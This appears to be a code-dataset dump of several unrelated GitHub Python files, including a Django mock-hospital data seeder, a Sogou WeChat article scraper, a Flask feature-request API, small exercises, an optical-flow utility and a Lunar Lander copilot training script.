in Surgeon.objects.all() if s.can_perform(stype)]\n if eligable_nurses and eligable_surgeons:\n sur = Surgery(\n date=fake.date(),\n surgeon=eligable_surgeons[0],\n nurse=eligable_nurses[0],\n patient=p,\n code=\"neu\",\n anatomical_location=\"Head\",\n category=\"h\",\n type=stype,\n special_needs=\"None\"\n )\n sur.save()\n\n print(\"Created 75 mock patients\")\n\n def create_many_physicians(self):\n for _ in range(TOTAL_PHYSICIANS):\n first = fake.first_name()\n p = Physician(\n first_name=first,\n last_name=fake.last_name(),\n dob=fake.date(),\n gender=\"M\" if 'c' in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n specialty=constants.SPECIALTIES[random.randint(0, len(constants.SPECIALTIES)-1)][0],\n salary=random.randint(40_000, 180_000)\n )\n p.save()\n\n def create_many_surgeons(self):\n for _ in range(TOTAL_SURGEONS):\n first = fake.first_name()\n s = Surgeon(\n first_name=first,\n last_name=fake.last_name(),\n dob=fake.date(),\n gender=\"M\" if 'c' in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n specialty=constants.SPECIALTIES[random.randint(0, len(constants.SPECIALTIES)-1)][0],\n contract_length=random.randint(1, 10),\n contract_type=\"Type\"+str(random.randint(1, 5))\n )\n s.save()\n\n # def add_staff_to_patient(self):\n # for _ in range(5):\n # p = Physician.objects.order_by('?').first()\n # person = Person.get(pk = p.emp_number) #objects. filter( pk = p.emp_number ).\n # patient = Patient( person_ptr = person.emp_number, \n # blood_type= \"op\",\n # blood_sugar = 4,\n # cholesterol_hdl = 5,\n # cholesterol_ldl = 6,\n # cholesterol_tri = 7 )\n # patient.save_base( raw = True )\n\n def handle(self, *args, **options):\n \"\"\" Call the command \"\"\"\n\n self.reset_db()\n\n # Start creating mock data and relations\n print(\"Mocking up the database...\")\n\n # Create skills, types, etc\n self.populate_constants()\n\n # Create our Chief of Staff (Also a Physician)\n chief = get_chief_of_staff()\n print(f\"Created our Chief of Staff '{chief.first_name} {chief.last_name}'\")\n\n # Create a neurosurgeon\n neurosurgeon = self.create_neurosurgeon()\n\n # Create plastic surgeon\n plastic_surgeon = self.create_plastic_surgeon()\n\n # Create a plastic surgery nurse\n plastic_nurse = self.create_plastic_nurse()\n\n # Create a physicians\n general_physician = self.create_general_physician()\n optomotrist = self.create_optomotrist()\n\n # Create a patient (auto assigned to cheif)\n general_patient = self.create_general_patient()\n assert general_patient.pcp == chief\n\n # Create medication1 and medication2\n medication1 = self.create_medication1()\n medication2 = self.create_medication2()\n\n # Create interactions\n self.create_medication_interaction()\n\n self.create_many_nurses()\n self.create_many_surgeons()\n self.create_many_physicians()\n self.create_many_patients()\n \n # self.add_staff_to_patient()\n\n # Assign patient from COF to general\n general_patient.pcp = general_physician\n general_patient.save()\n\n # Get this patient in for consultation\n general_patient_visit = Consultation(\n physician=general_physician,\n patient=general_patient,\n date=datetime.now()\n )\n general_patient_visit.save()\n print(general_patient_visit)\n\n # Patient can also see opt, who is not primary\n opt_visit = Consultation(\n physician=optomotrist,\n patient=general_patient,\n date=datetime(2023, 8, 1)\n )\n print(opt_visit)\n\n # # Give patient a bed and room, make sure admitted works\n # bed_names = {\n # \"gcu-1A\": type(None), # Patient w/ no bed, before update this is null\n # \"gcu-2A\": datetime, # Moving patient to new bed, has admitted time\n # None: datetime, # Admitted time there from last, removing bed relation\n # }\n # for bed_name, admitted_type in bed_names.items():\n # assert isinstance(general_patient.admission_date, admitted_type)\n # bed = Bed.objects.get_bed_by_code(bed_name)\n # general_patient.bed = bed\n # general_patient.save()\n\n # Patient comes out in gcu-1A bed\n # general_patient.bed = Bed.objects.get_bed_by_code(\"gcu-1A\")\n general_patient.save()\n\n call_command(\"runserver\")","repo_name":"matthew-f-bailey/dbmgmt","sub_path":"hospital/management/commands/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10318649770","text":"import numpy as np\n\nfrom holoviews.element import HeatMap, Image\n\nfrom .testplot import TestMPLPlot, mpl_renderer\n\n\nclass TestLayoutPlot(TestMPLPlot):\n\n def test_heatmap_invert_axes(self):\n arr = np.array([[0, 1, 2], [3, 4, 5]])\n hm = HeatMap(Image(arr)).opts(plot=dict(invert_axes=True))\n plot = mpl_renderer.get_plot(hm)\n artist = plot.handles['artist']\n self.assertEqual(artist.get_array().data, arr.T[::-1, ::-1])\n self.assertEqual(artist.get_extent(), (0, 2, 0, 3))\n","repo_name":"SebastianRiedel/holoviews","sub_path":"tests/plotting/matplotlib/testheatmapplot.py","file_name":"testheatmapplot.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23038424972","text":"#2675 문자열 반복\n\nn = int(input())\nfor i in range(n):\n li = list(input().split())\n repeat = int(li[0])\n temp = \"\"\n for j in li[1]:\n for _ in range(repeat):\n temp += j\n \n print(temp)\n","repo_name":"LKM0222/BackJunCoding","sub_path":"Problem/Solution/2675.strLoop.py","file_name":"2675.strLoop.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72978974807","text":"import re\r\nfrom PIL import Image\r\nimport codecs\r\nimport time\r\nimport download_img\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom redis_tool.redis_url import REDIS_URL\r\nfrom check_QR import CHECK_QRCORE\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nimport logging\r\nlogging.basicConfig(level = logging.DEBUG,filename='sogou_weixin.log',format = '%(asctime)s - %(name)s - %(funcName)s - %(levelname)s - %(message)s')\r\nlogging.basicConfig(level = logging.INFO,filename='sogou_weixin.log',format = '%(asctime)s - %(name)s - %(funcName)s - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\nlogger.setLevel(logging.DEBUG)\r\n\r\ndef do():\r\n redis_url = REDIS_URL() # redis去重\r\n check_qrcore = CHECK_QRCORE(redis_url) # QR check\r\n\r\n url = 'http://weixin.sogou.com/'\r\n\r\n keyword = '入群 聊天'\r\n\r\n delay_time = 1 # 操作延迟时间\r\n\r\n opt = webdriver.ChromeOptions()\r\n opt.binary_location = r'D:\\Google\\Chrome\\Application\\chrome.exe'\r\n opt.headless = True # 无GUI 运行\r\n\r\n driver = webdriver.Chrome(options=opt, executable_path=r'D:\\Anaconda3\\Scripts\\chromedriver.exe')\r\n driver.implicitly_wait(10)\r\n driver.set_window_size(1280, 800)\r\n driver.get(url)\r\n\r\n # 浏览器点击逻辑\r\n driver.find_element_by_xpath('//*[@id=\"query\"]').send_keys(keyword) #查询关键词\r\n driver.find_element_by_xpath('//*[@id=\"searchForm\"]/div/input[3]').click() #点击查询文章\r\n time.sleep(5)\r\n driver.find_element_by_xpath('//*[@id=\"tool_show\"]/a').click() #点击搜索工具\r\n time.sleep(1)\r\n driver.find_element_by_xpath('//*[@id=\"time\"]').click() #点击全部时间\r\n time.sleep(1)\r\n # driver.find_element_by_xpath('//*[@id=\"tool\"]/span[1]/div/a[3]').click() #点击一周\r\n driver.find_element_by_xpath('//*[@id=\"tool\"]/span[1]/div/a[2]').click() #d点击一天\r\n\r\n for i in range(0,100):\r\n logger.info('{:-^20}'.format('第%d页' % (i + 1)))\r\n time.sleep(5)\r\n\r\n bs = BeautifulSoup(driver.page_source, 'lxml')\r\n\r\n ll = bs.find(class_='news-list').find_all('li', recursive=False)\r\n # logger.debug(ll)\r\n # logger.debug(len(ll))\r\n for l in ll:\r\n _href = l.find(class_='txt-box').find('h3').find('a').attrs['href']\r\n\r\n if not redis_url.ismember_url_hash(url=_href):\r\n redis_url.add_url_hash(url=_href)#添加\r\n logger.info('%s-%s'%('采集',_href))\r\n try:\r\n name_l = download_img.download_img(_href)\r\n check_qrcore.check_copy(name_l)\r\n except Exception as ex:\r\n logger.error('%s-%s' % (_href, ex))\r\n else:\r\n logger.info('%s-%s'%('去重',_href))\r\n\r\n # 等待点击下一页\r\n try:\r\n WebDriverWait(driver, 10, 0.5).until(\r\n expected_conditions.presence_of_element_located((By.XPATH, '//*[@id=\"sogou_next\"]')))\r\n driver.find_element_by_xpath('//*[@id=\"sogou_next\"]').click()\r\n except Exception as ex:\r\n logger.error(ex)\r\n break # 跳出循环\r\n\r\n\r\n time.sleep(10)\r\n driver.save_screenshot('screenshot.png')\r\n logger.info('%s结束运行!' % (__file__))\r\n\r\nif __name__ == '__main__':\r\n do()","repo_name":"lcx1995/weixin_group_spider","sub_path":"sogou_weixin.py","file_name":"sogou_weixin.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6857230316","text":"import json\nimport uuid\nimport datetime\n\nfrom flask import Flask, render_template, request, abort\nfrom werkzeug.exceptions import BadRequest\n\nfrom models import db, Feature\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../test.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/feature-request\")\ndef feature_request():\n return render_template(\"feature-request.html\")\n\n\n@app.route(\"/api/v1/feature\", methods=[\"GET\", \"POST\"])\n@app.route(\"/api/v1/feature/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef feature_api_endpoint(feature_id=None):\n \"\"\" REST API endpoint for AJAX \"\"\"\n\n if request.method == \"GET\":\n if feature_id:\n feature = get_feature_by_id(feature_id)\n return query_to_json(feature)\n else:\n features = Feature.query.all()\n return query_to_json(features)\n\n if request.method == \"POST\":\n feature = parse_feature(request)\n reorder_client_priorities(feature)\n save_feature_request(feature)\n return json.dumps({'status': 'success'})\n\n if request.method == \"PUT\":\n updates = parse_feature(request)\n reorder_client_priorities(updates)\n feature = get_feature_by_id(feature_id)\n for key, val in updates.iteritems():\n setattr(feature, key, val)\n db.session.commit()\n return json.dumps({'status': 'success'})\n\n if request.method == \"DELETE\":\n feature = get_feature_by_id(feature_id)\n db.session.delete(feature)\n db.session.commit()\n return json.dumps({'status': 'success'})\n\n\n#################\n# Helpers\n#################\n\ndef get_feature_by_id(feature_id):\n \"\"\"\n makes sure a feature id is supplied and returns a feature object\n :param feature_id: a feature id as a string\n :return: a feature class model object\n \"\"\"\n if not feature_id:\n abort(400, 'feature id required')\n feature_id = uuid.UUID(feature_id)\n feature = Feature.query.get(feature_id)\n if not feature:\n abort(400, \"couldn't find the requested id\")\n return feature\n\n\ndef query_to_json(query):\n \"\"\"\n turns a sqlalchemy query object into a json string\n :param query: sqlalchemy object\n \"\"\"\n features = []\n for feature in query:\n features.append({\n 'id': str(feature.id),\n 'title': feature.title,\n 'description': feature.description,\n 'client': feature.client,\n 'client_priority': feature.client_priority,\n 'target_date': str(feature.target_date),\n 'product_area': feature.product_area\n })\n return json.dumps(features)\n\n\ndef parse_feature(request):\n \"\"\"\n Check data is valid json and turn the date field\n into a python date object and priority into an int\n :param request: a flask request object\n :return: feature dict\n \"\"\"\n try:\n feature = request.get_json()\n if not feature:\n raise BadRequest\n except BadRequest:\n abort(400, 'invalid json')\n required_fields = [\n 'title',\n 'description',\n 'client',\n 'client_priority',\n 'target_date',\n 'product_area'\n ]\n for field in required_fields:\n if not feature.get(field):\n abort(400, 'whoops, \"' + field + '\" is required')\n feature['target_date'] = datetime.datetime.strptime(feature['target_date'], '%Y-%m-%d').date()\n feature['client_priority'] = int(feature['client_priority'])\n return feature\n\n\ndef reorder_client_priorities(feature):\n \"\"\"\n Reorders client priorities within the database if the given feature\n has a client_id that conflicts with an existing one.\n :param feature: a feature as a dict\n \"\"\"\n client_features = Feature.query.filter_by(client=feature['client'])\n reorder = False\n priority_list = []\n for i in client_features:\n priority_list.append(i.client_priority)\n if i.client_priority == feature['client_priority']:\n reorder = True\n priority = feature['client_priority']\n if reorder:\n for i in client_features:\n if i.client_priority >= priority:\n i.client_priority += 1\n\n db.session.commit()\n\n\ndef save_feature_request(feature):\n \"\"\"\n Saves a feature dictionary into the database\n :param feature: a dictionary of feature request data\n \"\"\"\n db.session.add(Feature(\n title=feature.get('title'),\n description=feature.get('description'),\n client=feature.get('client'),\n client_priority=feature.get('client_priority'),\n target_date=feature.get('target_date'),\n product_area=feature.get('product_area')\n ))\n db.session.commit()\n\n\ndef create_db():\n \"\"\" Helper to create a local test database \"\"\"\n new_app = Flask(__name__)\n new_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../test.db'\n new_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(new_app)\n db.create_all(app=new_app)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"santeyio/feature-request-app","sub_path":"featurerequests.py","file_name":"featurerequests.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14551235478","text":"class Car:\r\n\r\n def __init__(self,make,model,year):\r\n self.make=make\r\n self.model=model\r\n self.year=year\r\n self.odometer=20\r\n\r\n def about_car(self):\r\n data=f\"{self.make} {self.model} {self.year}\"\r\n return data.title()\r\n def reading(self):\r\n print(f\"{self.odometer} miles on it\")\r\n def update_reading(self,miles):\r\n if miles>=self.odometer:\r\n self.odometer=miles\r\n else:\r\n print(\"you cant roll back reading\")\r\n def incr_reading(self,miles):\r\n self.odometer+=miles\r\n\r\n\r\ncar1=Car(\"swift\",\"dezire\",2020)\r\ncar2=Car(\"tata\",\"nexon\",2017)\r\ncar3=Car(\"kia\",\"centuro\",2018)\r\ncar4=Car(\"tata\",\"indica\",2014)\r\nprint(car1.about_car())\r\ncar1.reading()\r\nprint(car2.about_car())\r\ncar2.odometer=10\r\ncar2.reading()\r\nprint(car3.about_car())\r\ncar3.update_reading(55)\r\ncar3.reading()\r\nprint(car4.about_car())\r\ncar4.incr_reading(20)\r\ncar4.reading()","repo_name":"vijaypathem/python","sub_path":"pythpn pfiles2/car_class.py","file_name":"car_class.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70103655767","text":"import sys\nfrom logging import DEBUG, INFO, StreamHandler, getLogger\n\nfrom .config import ConfigParser\n\n\ndef build_logger(config, debug=False):\n try:\n config = config['logger']\n except (KeyError, TypeError):\n config = ConfigParser(default_sections=('logger',))\n config = config['logger']\n\n logger = getLogger('sparpy')\n logger.addHandler(StreamHandler(stream=sys.stdout))\n if debug:\n logger.setLevel(DEBUG)\n else:\n logger.setLevel(config.getint('level', fallback=INFO))\n\n return logger\n","repo_name":"alfred82santa/sparpy","sub_path":"sparpy/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"21590613258","text":"account_balance = 0\npurchase_history = []\n# тут без глобальных переменных похоже никак, иначе при втоорм заходе не покажет баланс и список покупок\ndef my_banking():\n global account_balance\n global purchase_history\n\n\n print('1. пополнение счета')\n print('2. покупка')\n print('3. история покупок')\n print('4. баланс счета')\n print('5. выход')\n\n choice = input('Выберите пункт меню: ')\n\n while choice != '5':\n\n if choice == '1':\n account_balance += int(input('Введите сумму для пополнения: '))\n elif choice == '2':\n purchase = int(input('Введите сумму покупки: '))\n if purchase <= account_balance:\n purchase_history.append((input('Введите название покупки: '), purchase))\n balance -= purchase\n elif choice == '3':\n print(purchase_history)\n elif choice == '4':\n print(f'Баланс счета = {account_balance}')\n elif choice == '5':\n return\n else:\n print('Неверный пункт меню')\n\n choice = input('Выберите пункт меню: ')","repo_name":"Mikhail-RnD/nu_lessons_5","sub_path":"bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36821476476","text":"import csv\n\nclass CSVReader:\n\n def __init__(self):\n pass\n\n\n def as_matrix(self, filename, inc_headers=False):\n data = []\n with open(filename, 'rU') as file:\n reader = csv.reader(file, delimiter=',', quotechar='|')\n data = [row for row in reader]\n\n return data\n\n\n def as_dict(self, filename, inc_headers=False):\n with open(filename, 'rU') as file:\n reader = csv.reader(file, delimiter=',', quotechar='|')\n headers = reader.next()\n\n records = []\n for row in reader:\n dict = {}\n for i in range(len(headers)):\n dict[headers[i]] = row[i]\n\n records.append(dict)\n\n\n if inc_headers:\n records = headers.extend(records)\n\n return records\n\n\n def headers(self):\n return self.data()[0]","repo_name":"robinrob/csv","sub_path":"csv_reader.py","file_name":"csv_reader.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2605437916","text":"from db import *\nimport random, string\n\ndef gen_key():\n\tkey = ''.join(random.choices(string.ascii_letters + string.digits, k=7))\n\treturn key\n\ndef datetime_range(start, end, delta):\n\tcurrent = start\n\ttimes = [str(current)]\n\twhile current < end:\n\t\t\tcurrent += delta\n\t\t\ttimes.append(str(current))\n\n\treturn times\n\n\n\n","repo_name":"JMMFL/when-works","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30673599840","text":"import torch\r\nimport copy\r\nimport numpy as np\r\nimport cv2\r\nfrom torch import from_numpy, transpose\r\nfrom torch.autograd import Variable\r\nfrom torchvision import transforms\r\nfrom torchvision.utils import save_image\r\n\r\nfrom dataset import get_loader\r\nfrom utils import reformat\r\nfrom configuration import *\r\n\r\n\r\ndef warp_flow(img, flow):\r\n img = np.float32(reformat(img))\r\n h, w = flow.shape[:2]\r\n flow = -flow\r\n flow[:,:,0] += np.arange(w)\r\n flow[:,:,1] += np.arange(h)[:,np.newaxis]\r\n res = cv2.remap(img, flow, None, cv2.INTER_LINEAR)\r\n # res = cv2.cvtColor(res, cv2.COLOR_BGR2RGB)\r\n return res\r\n\r\n\r\ndef array_to_torch(x):\r\n \"\"\" input: np array of shape h, w, 3\r\n output: pytorch tensor of shape 1, 3, h, w \"\"\"\r\n x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)\r\n x = np.array([x])\r\n x = from_numpy(x)\r\n x = transpose(x, 1,3)\r\n x = transpose(x, 2,3)\r\n x = x.div_(255.0)\r\n return x\r\n\r\n\r\ndef confidence_mask(f1, f2, gpu=True):\r\n rgb_f, flow_f = opticalflow(f1, f2)\r\n rgb_b, flow_b = opticalflow(f2, f1)\r\n f1_w_w = warp_flow(f1, flow_f + flow_b)\r\n f1_w_w = array_to_torch(f1_w_w)\r\n if gpu:\r\n f1_w_w = f1_w_w.to(device=0)\r\n \r\n w_w = torch.norm(f1 - f1_w_w, dim=1)**2\r\n # Parameters to be adjusted\r\n occlusion_mask = (w_w < 0.001*(torch.norm(f1, dim=1)**2 +\r\n torch.norm(f1_w_w, dim=1)**2))# - 0.005)\r\n occlusion_mask = occlusion_mask.type('torch.FloatTensor')\r\n return occlusion_mask\r\n\r\n\r\n# input is numpy image array\r\ndef opticalflow(img1, img2):\r\n b, c, h, w = img1.shape\r\n # examine(img1, 'img1 before reformat')\r\n\r\n img1 = np.float32(reformat(img1))\r\n img2 = np.float32(reformat(img2))\r\n # examine(img1, 'img1 after reformat')\r\n\r\n prev = cv2.cvtColor(img1, cv2.COLOR_RGB2GRAY)\r\n nxt = cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY)\r\n # examine(prev, 'prev = img1 in grayscale')\r\n\r\n flow = cv2.calcOpticalFlowFarneback(prev, nxt, flow=None,\r\n pyr_scale=0.5, levels=3, # wb 1?\r\n winsize=15, iterations=3,# wb 2?\r\n poly_n=5, poly_sigma=1.2,# wb 1.1?\r\n flags=0)\r\n # examine(flow, 'flow:')\r\n\r\n hsv = np.zeros_like(img1, np.uint8)\r\n hsv[:, :, 1] = 255\r\n mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])\r\n hsv[...,0] = ang*180/np.pi/2\r\n hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)\r\n # examine(hsv, 'final hsv:')\r\n\r\n rgb = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)\r\n rgb = np.float32(rgb)\r\n rgb = array_to_torch(rgb)\r\n # examine(rgb, 'rgb final')\r\n return rgb, flow\r\n\r\n\r\ndef examine(x, sentence):\r\n print('***********')\r\n print(sentence)\r\n print(x.shape, x.dtype)\r\n print(x.min(), x.max(), x.mean())\r\n\r\n\r\nif __name__ == '__main__':\r\n data_path = VIDEO_PATH \r\n img_shape = (640, 360)\r\n videonames = ['9_17_s.mp4']\r\n transform = transforms.ToTensor()\r\n loader = get_loader(1, data_path, img_shape, transform, video_list=videonames, frame_nb=20, shuffle=False)\r\n t = Transfer(100,\r\n VIDEO_PATH,\r\n './examples/style_img/candy.jpg',\r\n '/home/{}/.torch/models/vgg19-dcbb9e9d.pth'.format(USER),\r\n 1e-4,\r\n 2e-1, 1e0, 0, 0,\r\n gpu=GPU)\r\n \r\n t.style_net.load_state_dict(torch.load('models/state_dict_STARWORKING_contentandstyle.pth', map_location='cpu'))\r\n \r\n for idx, frames in enumerate(loader):\r\n for i in range(5,7):\r\n print(i)\r\n print(len(frames))\r\n f1, f2 = copy.deepcopy((frames[i-1], frames[i]))\r\n\r\n # Collect optical flow from f1 to f2\r\n rgb, flow = opticalflow(f1, f2)\r\n examine(rgb, 'rgb')\r\n examine(flow, 'flow')\r\n # Warp f1 to f2\r\n f1_w = warp_flow(f1, flow)\r\n f1_w = array_to_torch(f1_w)\r\n\r\n # Compute occlusion mask\r\n occlusion_mask = confidence_mask(f1, f2, GPU)\r\n\r\n # Transfer style to f1, f2, and warp f1 stylized using f1 -> f2 optical flow\r\n f1_trans = Variable(f1, requires_grad=True)\r\n f2_trans = Variable(f2, requires_grad=True)\r\n f1_trans, _ = t.style_net(Variable(f1, requires_grad=True))\r\n f2_trans, _ = t.style_net(Variable(f2, requires_grad=True))\r\n f1_trans = 0.5 * (f1_trans + 1)\r\n f2_trans = 0.5 * (f2_trans + 1)\r\n f1_trans_w = warp_flow(f1_trans, flow)\r\n f1_trans_w = array_to_torch(f1_trans_w)\r\n\r\n # Save images for analysis.\r\n save_image(f1, 'tmp/{}_frame1.jpg'.format(i))\r\n save_image(f2, 'tmp/{}_frame2.jpg'.format(i))\r\n save_image(f1_w, 'tmp/{}_frame1warpedinto2.jpg'.format(i))\r\n save_image(f1_trans, 'tmp/{}_trans_frame1.jpg'.format(i))\r\n save_image(f2_trans, 'tmp/{}_trans_frame2.jpg'.format(i))\r\n save_image(f1_trans_w, 'tmp/{}_trans_frame1warpedinto2.jpg'.format(i))\r\n save_image(rgb, 'tmp/{}_rgb.jpg'.format(i))\r\n save_image(occlusion_mask, 'tmp/{}_occlusion.jpg'.format(i))\r\n","repo_name":"TanguyJeanneau/white-mirror","sub_path":"src/pkg/opticalflow.py","file_name":"opticalflow.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16641128847","text":"from bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nfrom time import sleep # be nice\n \nBASE_URL = \"http://www.kmart.com\"\ncount=0\n \ndef make_soup(url):\n html = urlopen(url).read()\n return BeautifulSoup(html, 'html.parser')\n \ndef get_category_links(section_url):\n soup = make_soup(section_url)\n #boccat=soup.findAll('li',{'class':' gnf_nav_depth1_item gnf_dept_tree_item'})\n boccat = soup.findAll(\"li\", \" gnf_nav_depth3_item\")\n file=open(\"newfile.txt\", \"a\")\n \n category_links=[]\n for dd in boccat:\n temp= dd.find('a')\n if temp is not None:\n temp2=BASE_URL+dd.find('a')['href']\n file.write(temp2+'\\n')\n with open('newfile.txt') as f:\n for line in f:\n category_links.append(line)\n return category_links\n \n \ndef get_products(category_url):\n global count\n soup = make_soup(category_url)\n file=open(\"data.txt\", \"a\")\n #print soup\n boccat = soup.findAll(\"div\", \"cardProdTitle\")\n for prod in boccat:\n temp=prod.find('a')\n if temp is not None:\n link=BASE_URL+prod.find('a')['href']\n title=prod.find('a')['title']\n count=count+1\n file.write(str(count)+ \"\\t\"+ title.encode('utf8')+ \"\\t\"+ link.encode('utf8')+ '\\n')\n #file.write(link.encode('utf8') + '\\n\\n')\n #title2=encode(title)\n #link2=encode(link)\n #file.write(title2+ \"\\n\")\n #file.write(link2+\"\\n\\n\")\n \n \nif __name__ == '__main__':\n section = (\"http://www.kmart.com/appliances/b-20002\")\n\t\n \n \n categories = get_category_links(section)\n for category in categories:\n sub_category_links=get_category_links(category)\n for sub in sub_category_links:\n sub2_cat=get_category_links(sub)\n for sub2 in sub2_cat:\n #print sub2\n get_products(sub2)\n sleep(1)\n \n","repo_name":"harishabhishek/D-buggers","sub_path":"webScrapingKmartAppliances.py","file_name":"webScrapingKmartAppliances.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4877484465","text":"from __future__ import division\nimport pickle\nimport random\nimport os\nimport math\nimport types\nimport uuid\nimport time\nfrom copy import copy\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nimport gym\nfrom gym import spaces, wrappers\nfrom gym.envs.registration import register\nfrom envs import LunarLanderEmpowerment, LunarLander\nimport cloudpickle\nfrom policies import FullPilotPolicy, LaggyPilotPolicy, NoopPilotPolicy, NoisyPilotPolicy, SensorPilotPolicy, CoPilotPolicy\n\nimport tensorflow as tf\n\nfrom baselines import logger\nfrom baselines.common.schedules import LinearSchedule\nfrom baselines import deepq\nfrom baselines.common import models\nfrom baselines.deepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer\nfrom baselines.deepq.deepq import ActWrapper\n\nimport doodad as dd\nimport doodad.mount as mount\nimport doodad.easy_sweep.launcher as launcher\nimport multiprocessing\nfrom doodad.easy_sweep.hyper_sweep import run_sweep_doodad\n\nfrom experiment_utils import config\nfrom experiment_utils.utils import query_yes_no\n\nfrom baselines.common.tf_util import make_session\n\nfrom matplotlib import pyplot as plt\nimport argparse\nfrom utils.env_utils import *\nfrom datetime import datetime\n\nEXP_NAME = \"CopilotTraining\"\n\ndef str_of_config(pilot_tol, pilot_type):\n return \"{'pilot_type': '%s', 'pilot_tol': %s}\" % (pilot_type, pilot_tol)\n\n\ndef run_ep(policy, env, max_ep_len, render=False, pilot_is_human=False):\n obs = env.reset()\n done = False\n totalr = 0.\n trajectory = None\n actions = []\n for step_idx in range(max_ep_len + 1):\n if done:\n trajectory = info['trajectory']\n break\n action = policy.step(obs[None, :])\n obs, r, done, info = env.step(action)\n actions.append(action)\n if render:\n env.render()\n totalr += r\n outcome = r if r % 100 == 0 else 0\n return totalr, outcome, trajectory, actions\n\n\ndef run_ep_copilot(policy, env, max_ep_len, pilot, pilot_tol, render=False, pilot_is_human=False):\n obs = env.reset()\n done = False\n totalr = 0.\n trajectory = None\n actions = []\n pilot_actions = np.zeros((env.num_concat * env.act_dim))\n for step_idx in range(max_ep_len + 1):\n if done:\n trajectory = info['trajectory']\n break\n action, pilot_actions = policy.step(obs[None, :], pilot, pilot_tol, pilot_actions)\n obs, r, done, info = env.step(action)\n actions.append(action)\n if render:\n env.render()\n totalr += r\n outcome = r if r % 100 == 0 else 0\n return totalr, outcome, trajectory, actions\n\n\ndef run_experiment(empowerment, exp_title, seed):\n now = datetime.now()\n\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n base_dir = os.path.join(config.DOCKER_MOUNT_DIR, EXP_NAME)\n# base_dir = os.getcwd() + '/data/' + exp_title + now.strftime(\"%m-%d-%Y-%H-%M-%S\") + \"_\" + empowerment #\n logger.configure(dir=base_dir, format_strs=['stdout', 'log', 'csv', 'tensorboard'])\n\n f = open(base_dir + \"/config.txt\", \"w\")\n f.write(\"Empowerment: {}\\n\".format(empowerment))\n f.write(\"Num concat: 20\\n\")\n f.write(\"Seed: {}\\n\".format(seed))\n f.write(\"No scale by height\\n\")\n f.write(\"Keep main engine from pilot\")\n f.close()\n\n max_ep_len = 1000\n n_training_episodes = 500\n\n env = LunarLanderEmpowerment(empowerment=0.0, ac_continuous=False)\n\n max_timesteps = max_ep_len * n_training_episodes\n full_pilot_policy = FullPilotPolicy(base_dir)\n full_pilot_policy.learn(env, max_timesteps)\n laggy_pilot_policy = LaggyPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n noisy_pilot_policy = NoisyPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n noop_pilot_policy = NoopPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n sensor_pilot_policy = SensorPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n sim_pilots = [full_pilot_policy, laggy_pilot_policy, noisy_pilot_policy, noop_pilot_policy, sensor_pilot_policy]\n\n pilot_names = ['full', 'laggy', 'noisy', 'noop', 'sensor']\n n_eval_eps = 100\n\n pilot_evals = [\n list(zip(*[run_ep(sim_policy, env, render=False, max_ep_len=max_ep_len) for _ in\n range(n_eval_eps)])) for\n sim_policy in sim_pilots]\n\n mean_rewards = [np.mean(pilot_eval[0]) for pilot_eval in pilot_evals]\n outcome_distrns = [Counter(pilot_eval[1]) for pilot_eval in pilot_evals]\n\n 